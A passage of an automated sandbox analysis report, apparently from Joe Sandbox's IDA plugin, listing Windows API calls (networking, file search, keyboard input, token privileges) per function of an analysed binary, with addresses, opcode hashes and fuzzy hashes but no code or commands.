                                                                                                                        • Part of subcall function 003C010A: __CxxThrowException@8.LIBCMT ref: 003C0153
                                                                                                                      • _memmove.LIBCMT ref: 00413020
                                                                                                                      • _memmove.LIBCMT ref: 00413135
                                                                                                                      • _memmove.LIBCMT ref: 004131DC
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1300846289-0
                                                                                                                      • Opcode ID: 92a0039afa613422a9baf8f44ea46b9b11959ddeb8bca311b63874a419058b52
                                                                                                                      • Instruction ID: dbe6d8f2edb353dcf68dc696d72c9a77ab39b7e0b087c50225b07c7e89ac37b9
                                                                                                                      • Opcode Fuzzy Hash: 92a0039afa613422a9baf8f44ea46b9b11959ddeb8bca311b63874a419058b52
                                                                                                                      • Instruction Fuzzy Hash: C902A171A00205EFCF09DF68C981AAEBBF5EF49300F14846AE806DB255EB35DE51CB95
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003FACD3: inet_addr.WS2_32(00000000), ref: 003FACF5
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 003F973D
                                                                                                                      • WSAGetLastError.WS2_32(00000000,00000000), ref: 003F9760
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4170576061-0
                                                                                                                      • Opcode ID: 7a757c9bb2ccbaee5546d72ae8e5e45602ae3568d520c2ff375a51ad570b1fb0
                                                                                                                      • Instruction ID: fb6b48cdc3bc05d063599703e3117967b529d425d2a70acb45b43dee95f6d4ac
                                                                                                                      • Opcode Fuzzy Hash: 7a757c9bb2ccbaee5546d72ae8e5e45602ae3568d520c2ff375a51ad570b1fb0
                                                                                                                      • Instruction Fuzzy Hash: F341E270A00204AFDB15AF24CC82EBEB7ECDF44328F548159FA16AF392CB749D018B91
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 003EF37A
                                                                                                                      • _wcscmp.LIBCMT ref: 003EF3AA
                                                                                                                      • _wcscmp.LIBCMT ref: 003EF3BF
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 003EF3D0
                                                                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 003EF3FE
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2387731787-0
                                                                                                                      • Opcode ID: ffd3cad5c1205981a54d29cdc32e732358ceeebeee204045c678d82a1b09f481
                                                                                                                      • Instruction ID: 0e601543eb3f943896cbfeb5d2f758ff7d97e45011e9199cec9cb6140d98d8ff
                                                                                                                      • Opcode Fuzzy Hash: ffd3cad5c1205981a54d29cdc32e732358ceeebeee204045c678d82a1b09f481
                                                                                                                      • Instruction Fuzzy Hash: 8B418B356007019FC719DF29C490A9AB3E4FF49324F10462EE95ACB3A1DB71A941CF91
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003E439C
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 003E43B8
                                                                                                                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003E4425
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 003E4483
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      • Opcode ID: 0befd373ccf54340ce71b65ab9f7555b9b36489945723b74fe1a1b6d4197eb33
                                                                                                                      • Instruction ID: 48650d07e8f0e4c82242a68589ffcf08d5279fafecd18d74b0a845e6172975e8
                                                                                                                      • Opcode Fuzzy Hash: 0befd373ccf54340ce71b65ab9f7555b9b36489945723b74fe1a1b6d4197eb33
                                                                                                                      • Instruction Fuzzy Hash: 5E411770F002A8AAEF329B6798087FD7BB9AB4D311F05035AF481976C1C7B489859B65
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • GetCursorPos.USER32(?), ref: 0040EFE2
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0041F3C3,?,?,?,?,?), ref: 0040EFF7
                                                                                                                      • GetCursorPos.USER32(?), ref: 0040F041
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0041F3C3,?,?,?), ref: 0040F077
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1423138444-0
                                                                                                                      • Opcode ID: a74e17d5891f7e2fb34713429e1f56a696caf455ee0664616477e68abff3d31e
                                                                                                                      • Instruction ID: 095f457700ccc4af4eba5b8e5f0f711b3d289019f7770ddd9256d1400eeb3672
                                                                                                                      • Opcode Fuzzy Hash: a74e17d5891f7e2fb34713429e1f56a696caf455ee0664616477e68abff3d31e
                                                                                                                      • Instruction Fuzzy Hash: B921F031600018AFCB258F64C898EEB7BB5EF49750F04407AF905A73A2D3349951DB95
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0041F352,?,?,?), ref: 0040F115
                                                                                                                        • Part of subcall function 003BB155: GetWindowLongW.USER32(?,000000EB), ref: 003BB166
                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0040F0FB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 1273190321-2594219639
                                                                                                                      • Opcode ID: 9ac6edbaa66d708cb340e242b903f635583db292c370ab1c9b6e9c589bc9e17a
                                                                                                                      • Instruction ID: c121de9e2e6ac95502dd09325e34f208ccaa8571f34a71cdbb80394b8588d377
                                                                                                                      • Opcode Fuzzy Hash: 9ac6edbaa66d708cb340e242b903f635583db292c370ab1c9b6e9c589bc9e17a
                                                                                                                      • Instruction Fuzzy Hash: B101DE31200204EBCB21AF14DC45FAA7BA6FBC5364F180139F9151F6E1C7B59C06DB99
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003E221E
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen
                                                                                                                      • String ID: ($|
                                                                                                                      • API String ID: 1659193697-1631851259
                                                                                                                      • Opcode ID: 674531e27b92d5a5fc07dba7e37c1d6c959f7624295f9ed7318245cb93808130
                                                                                                                      • Instruction ID: 4c43670f175702fefd5d29cc23f310e9799ea3ef0342f6b5bedb21ffb52427be
                                                                                                                      • Opcode Fuzzy Hash: 674531e27b92d5a5fc07dba7e37c1d6c959f7624295f9ed7318245cb93808130
                                                                                                                      • Instruction Fuzzy Hash: BD324674A006459FC729CF2AC480A6AF7F4FF48310B12C56EE59ADB3A1D770E941CB44
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 003BAE5E
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogLongNtdllProc_Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2065330234-0
                                                                                                                      • Opcode ID: fe1321ca3048f25799f2df1d0ac662972c39be864a9b436e926e833e65288de8
                                                                                                                      • Instruction ID: bd754639b817f1fbf5e1e30f5e53a6b2f8d6b2340fe371bdb228731aba516d12
                                                                                                                      • Opcode Fuzzy Hash: fe1321ca3048f25799f2df1d0ac662972c39be864a9b436e926e833e65288de8
                                                                                                                      • Instruction Fuzzy Hash: 35A10770104E05BADB3AAE294C98DFF395CDB4134DB14453FFA02D6DA1DA29CC46A277
                                                                                                                      APIs
                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003F4A1E,00000000), ref: 003F55FD
                                                                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003F5629
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 599397726-0
                                                                                                                      • Opcode ID: 821a977b3f53013dbb02b510b1e0f23b9163784ef34551a9f6e0e1a4625ebf9b
                                                                                                                      • Instruction ID: 0e37aaca1193c79827fa279fdcf569c1024273313f45a6b2a28a9af2eb04c061
                                                                                                                      • Opcode Fuzzy Hash: 821a977b3f53013dbb02b510b1e0f23b9163784ef34551a9f6e0e1a4625ebf9b
                                                                                                                      • Instruction Fuzzy Hash: 0B41F471600A0DBFEB128E94CC85FBFB7BDEB41758F10402EF706A6181DA709E419B54
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 003EEA95
                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003EEAEF
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003EEB3C
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1682464887-0
                                                                                                                      • Opcode ID: f576100030bca9d921814074c369e05f8decc97cb055a8989d8234defd3e682c
                                                                                                                      • Instruction ID: 800381125f1caa09decdbfa71a3d763c6d9bd5f6d0ea53c5bb57a88837487eb7
                                                                                                                      • Opcode Fuzzy Hash: f576100030bca9d921814074c369e05f8decc97cb055a8989d8234defd3e682c
                                                                                                                      • Instruction Fuzzy Hash: A2219035A00218EFCB00DFA5D884AEEFBB8FF49310F1480A9E905AB355DB31D915CB54
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003E704C
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003E708D
                                                                                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003E7098
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 33631002-0
                                                                                                                      • Opcode ID: fb29351528e65289733b079f6dbe5b55a621d2d6051a663feb33288ed173377a
                                                                                                                      • Instruction ID: 13cc9c99aa4883024e8c41c99603fe52cdc8e477709ba4a5a61427c990cb372b
                                                                                                                      • Opcode Fuzzy Hash: fb29351528e65289733b079f6dbe5b55a621d2d6051a663feb33288ed173377a
                                                                                                                      • Instruction Fuzzy Hash: F0115E71E00228BFEB218F95DC45BAEBBBCEB45B10F104162F900E7290D7B05E058BA5
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                        • Part of subcall function 003BB155: GetWindowLongW.USER32(?,000000EB), ref: 003BB166
                                                                                                                      • GetParent.USER32(?), ref: 0041F4B5
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,003BADDD,?,?,?,00000006,?), ref: 0041F52F
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 314495775-0
                                                                                                                      • Opcode ID: 9bf477c6a4bb605ef3ad8257fe6841f4da42079de98119046fa6b504e4f0080c
                                                                                                                      • Instruction ID: 26e797779ad5181d92dbe079b96278e37bcac672e127f5823888f09d3b85dd89
                                                                                                                      • Opcode Fuzzy Hash: 9bf477c6a4bb605ef3ad8257fe6841f4da42079de98119046fa6b504e4f0080c
                                                                                                                      • Instruction Fuzzy Hash: 0721C131700104AFCB26AF28CC48AFB3BA6AB09368F184265F2254B6F2DBB05D52D715
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0040F47D
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0041F42E,?,?,?,?,?), ref: 0040F4A6
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientDialogNtdllProc_Screen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3420055661-0
                                                                                                                      • Opcode ID: d4896b88f397463d46a2659219f4f6380fac1168d384e481434ca5f5a5f47f77
                                                                                                                      • Instruction ID: 65c40623ca28381e3f5063dad39644b2db9fd31a0a3e9c1ba1447be99fa50f4f
                                                                                                                      • Opcode Fuzzy Hash: d4896b88f397463d46a2659219f4f6380fac1168d384e481434ca5f5a5f47f77
                                                                                                                      • Instruction Fuzzy Hash: 2FF05472900118FFEF049F55DC059BE7FB8FF44351F54402AF901A2160D3B5AA56DB64
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003FC2E2,?,?,00000000,?), ref: 003ED73F
                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003FC2E2,?,?,00000000,?), ref: 003ED751
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3479602957-0
                                                                                                                      • Opcode ID: 5e03e59deea224d8c8af76ba73f9bc5bda11955daf59c28fee02351a4a742a5f
                                                                                                                      • Instruction ID: 0a1047b184aa6aecb553654a05710b0550f1ca3cdd71459502785c1ac958fc63
                                                                                                                      • Opcode Fuzzy Hash: 5e03e59deea224d8c8af76ba73f9bc5bda11955daf59c28fee02351a4a742a5f
                                                                                                                      • Instruction Fuzzy Hash: B7F0A03550032DBBDB22AFA4CC49FEA7B6CFF49761F008165B919DA181D730DA40CBA4
                                                                                                                      APIs
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 003E4B89
                                                                                                                      • keybd_event.USER32(?,753DC0D0,?,00000000), ref: 003E4B9C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InputSendkeybd_event
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3536248340-0
                                                                                                                      • Opcode ID: f9caadc6107a2187b0ae3ad8ce9050b1aeaa01518c065917c84900c681284eee
                                                                                                                      • Instruction ID: def57864608549853eab70551f6d5d8d415547377d3ad818399219cbaa318156
                                                                                                                      • Opcode Fuzzy Hash: f9caadc6107a2187b0ae3ad8ce9050b1aeaa01518c065917c84900c681284eee
                                                                                                                      • Instruction Fuzzy Hash: 59F06D7090028EAFDB068FA1C805BBE7BB4AF04305F008419F951A5291D3B9C6129F94
                                                                                                                      APIs
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003DB9EC), ref: 003DB8C5
                                                                                                                      • CloseHandle.KERNEL32(?,?,003DB9EC), ref: 003DB8D7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 81990902-0
                                                                                                                      • Opcode ID: 0c63cda01152e683a7ac3895b1ccc558fc6538cf4d152cfb118ed15e9f745bd3
                                                                                                                      • Instruction ID: 955e160f75a1241a9b98867cc890ee13b1acd1c9d8bbcc8c5aa5e64d2b1d79d5
                                                                                                                      • Opcode Fuzzy Hash: 0c63cda01152e683a7ac3895b1ccc558fc6538cf4d152cfb118ed15e9f745bd3
                                                                                                                      • Instruction Fuzzy Hash: FEE04632000600EEE72A2B64EC08E72BBE9EF04310B15882EF49680430CB62AC91EB10
                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0040F59C
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0041F3AD,?,?,?,?), ref: 0040F5C6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogLongNtdllProc_Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2065330234-0
                                                                                                                      • Opcode ID: a0bcf7d767ad150470e3b810fc92946ff932d8c0625cc5421e12ed6ede07ddcb
                                                                                                                      • Instruction ID: ca4c9f4ca0598777e13c643b30cfccb8e57e0c1a4bcbce4a66519260efa741e0
                                                                                                                      • Opcode Fuzzy Hash: a0bcf7d767ad150470e3b810fc92946ff932d8c0625cc5421e12ed6ede07ddcb
                                                                                                                      • Instruction Fuzzy Hash: 78E0CD30104218BBEB340F09DC0AF793B54FB00750F108536F917D80E1D7B48491D668
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,003A125D,003C7A43,003A0F35,?,?,00000001), ref: 003C8E41
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003C8E4A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: 791f81970d9c88182280dd556d99e617b3025e65558e20fe6402bc90762327c2
                                                                                                                      • Instruction ID: 5bfa2b19abe9f974c6b11d11f04db74232d0ef31c66df1428dd04adb2c89745c
                                                                                                                      • Opcode Fuzzy Hash: 791f81970d9c88182280dd556d99e617b3025e65558e20fe6402bc90762327c2
                                                                                                                      • Instruction Fuzzy Hash: 06B09271644A08ABFB106BA1EC09B983F68EB08A62F8040A0FA1D440608B6354528A9A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1f9e1e0d3a9110cce887a051fcf742942c707c5aecfbab5cd6bbeb98ac270c87
                                                                                                                      • Instruction ID: 1abdecff7b4a9d1dc37e8363d255b8837d840fcca4cff66a617cbd2c811375ae
                                                                                                                      • Opcode Fuzzy Hash: 1f9e1e0d3a9110cce887a051fcf742942c707c5aecfbab5cd6bbeb98ac270c87
                                                                                                                      • Instruction Fuzzy Hash: 43B11421D2AF404DD32396399971336B75CAFBB2C5F91E72BFC2674D62EB2285834180
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00410352
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogLongNtdllProc_Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2065330234-0
                                                                                                                      • Opcode ID: bb4cd4f9c1783cfa43922a60e261f8be742ea4f77eaba4554c362ec848486e78
                                                                                                                      • Instruction ID: 71a0871cdcf95677943cbf02c44736cf216369ae47743df4f200b34183b42bd9
                                                                                                                      • Opcode Fuzzy Hash: bb4cd4f9c1783cfa43922a60e261f8be742ea4f77eaba4554c362ec848486e78
                                                                                                                      • Instruction Fuzzy Hash: 68112B31204219BBF7251B288D49FFA3614E741760F24432BFD219A1E2CAF88DD1D2AE
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BB155: GetWindowLongW.USER32(?,000000EB), ref: 003BB166
                                                                                                                      • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0040E7AF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CallLongProc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4084987330-0
                                                                                                                      • Opcode ID: 4198516a768cf5eca6c0c884e2feb0de2230ad64cb0e8dc0fceb11d892aa9694
                                                                                                                      • Instruction ID: 07a80f20bad0c74b5915f5916d6c6ebac07984b1eac31f0e99bf7cda1d02aaf4
                                                                                                                      • Opcode Fuzzy Hash: 4198516a768cf5eca6c0c884e2feb0de2230ad64cb0e8dc0fceb11d892aa9694
                                                                                                                      • Instruction Fuzzy Hash: DDF04F31200108FFCF05AF55DC40DBA3BAAEB04360B048926FA159B6B1D7769D71EB99
                                                                                                                      APIs
